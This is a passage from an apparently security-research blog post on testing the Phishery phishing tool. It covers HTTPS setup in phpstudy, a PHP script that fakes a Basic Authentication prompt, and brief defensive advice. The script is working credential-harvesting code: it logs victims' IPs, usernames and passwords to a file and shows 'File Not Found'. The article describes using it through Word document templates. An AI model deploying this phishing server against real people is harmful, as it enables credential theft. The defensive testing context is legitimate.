-sha256\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>For more parameter details, refer to the previous article \"CIA Hive Beacon Infrastructure Reproduction 2 – Using Apache mod_rewrite for HTTPS Traffic Distribution\"\u003C\u002Fp>\u003Ch2>0x05 Supplement 2: PHP Implementation of Basic Authentication\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>PHP environment set up using phpstudy\u003C\u002Fp>\u003Ch3>1. Enable SSL in phpstudy\u003C\u002Fh3>\u003Ch4>(1) Modify the httpd.conf configuration file in the apache directory\u003C\u002Fh4>\u003Cp>Locate #LoadModule ssl_module modules\u002Fmod_ssl.so and remove the comment symbol #\u003C\u002Fp>\u003Cp>Add a line Include conf\u002Fvhosts_ssl.conf under # Secure (SSL\u002FTLS) connections\u003C\u002Fp>\u003Ch4>(2) Create the file vhosts_ssl.conf in the conf folder\u003C\u002Fh4>\u003Cp>Content as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Listen 443\u003Cbr>SSLStrictSNIVHostCheck off\u003Cbr>SSLCipherSuite AESGCM:ALL:!DH:!EXPORT:!RC4:+HIGH:!MEDIUM:!LOW:!aNULL:!eNULL\u003Cbr>SSLProtocol all -SSLv2 -SSLv3\u003Cbr>\u003Cvirtualhost *:443=\"\">\u003Cbr>    DocumentRoot \"C:\\WWW\"\u003Cbr>    ServerName test.com\u003Cbr>  \u003Cdirectory \"c:\\www\"=\"\">\u003Cbr>      Options FollowSymLinks ExecCGI\u003Cbr>      AllowOverride All\u003Cbr>      Order allow,deny\u003Cbr>      Allow from all\u003Cbr>      Require all granted\u003Cbr>  \u003C\u002Fdirectory>\u003Cbr>SSLEngine on\u003Cbr>SSLCertificateFile \"C:\\Apache\\conf\\ssl\\test.com.crt\"\u003Cbr>SSLCertificateKeyFile \"C:\\Apache\\conf\\ssl\\test.com.key\"\u003Cbr>\u003C\u002Fvirtualhost>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Restart phpstudy\u003C\u002Fh4>\u003Cp>Access https:\u002F\u002F127.0.0.1 for verification\u003C\u002Fp>\u003Ch3>2. Implement Basic Authentication in PHP, record user credentials\u003C\u002Fh3>\u003Cp>The PHP code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?php\u003Cbr-->if(!isset($_SERVER['PHP_AUTH_USER']) or !isset($_SERVER['PHP_AUTH_PW']))\u003Cbr>{\u003Cbr>\tfile_put_contents(\"log.txt\",\"ClientIP:\".$_SERVER['REMOTE_ADDR'].\"\\r\\n\",FILE_APPEND);\u003Cbr>\theader('WWW-Authenticate: Basic realm=\"Document Security\"');\u003Cbr>\theader('HTTP\u002F1.0 401 Unauthorized');\u003Cbr>} \u003Cbr>else \u003Cbr>{\u003Cbr>\tfile_put_contents(\"log.txt\",\"ClientIP:\".$_SERVER['REMOTE_ADDR'].\",\".$_SERVER['PHP_AUTH_USER'].\":\".$_SERVER['PHP_AUTH_PW'].\"\\r\\n\",FILE_APPEND);\u003Cbr>    print \"File Not Found\";\t\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The code implements recording user credentials and writing them to the file log.txt, returning 'File Not Found' to the user.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This PHP script can serve as a HTTPS Auth Server for Phishery\u003C\u002Fp>\u003Cp>Implementing Basic Authentication via PHP; if HTTPS is not used, the pop-up dialog will display additional prompts, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017474367_7_23719be008-1.jpeg\">\u003C\u002Fp>\u003Cp>If HTTPS is not used, it cannot be inserted as a Word document template into a Word document\u003C\u002Fp>\u003Ch2>0x06 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Detected actual attack activities:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fresearchcenter.paloaltonetworks.com\u002F2018\u002F08\u002Funit42-darkhydrus-uses-phishery-harvest-credentials-middle-east\u002F\u003C\u002Fp>\u003Cp>Based on the analysis in this article and the details of the actual attack activities, the following recommendations are provided:\u003C\u002Fp>\u003Cul>\u003Cli>Normal Word documents rarely require users to input credentials\u003C\u002Fli>\u003Cli>Check the domain's certificate (for HTTPS)\u003C\u002Fli>\u003Cli>Identify whether the domain name is forged\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article tests Phishery, introduces the testing details, analyzes the implementation principles, supplements the method of implementing Basic Authentication with PHP, and finally provides defense recommendations.\u003C\u002Fp>\u003Cp>In my opinion, another function of phishery is to use a Windows host on the internal network as a server to record credentials entered by the target.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",794,"Onedaysec",6,"published","2026-02-02T07:38:21.453Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Phishery Exploitation Test: Phishing via Basic Authentication","phishery, phishing, basic authentication, credential theft, HTTPS server, security testing, exploitation, SSL, Word document, cybersecurity",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,4],687,686,685,{"title":39,"description":39,"image":39},"2026-07-24T15:37:11.874Z","2026-07-23T16:01:57.404Z","draft","2026-07-23T16:14:11.356Z"]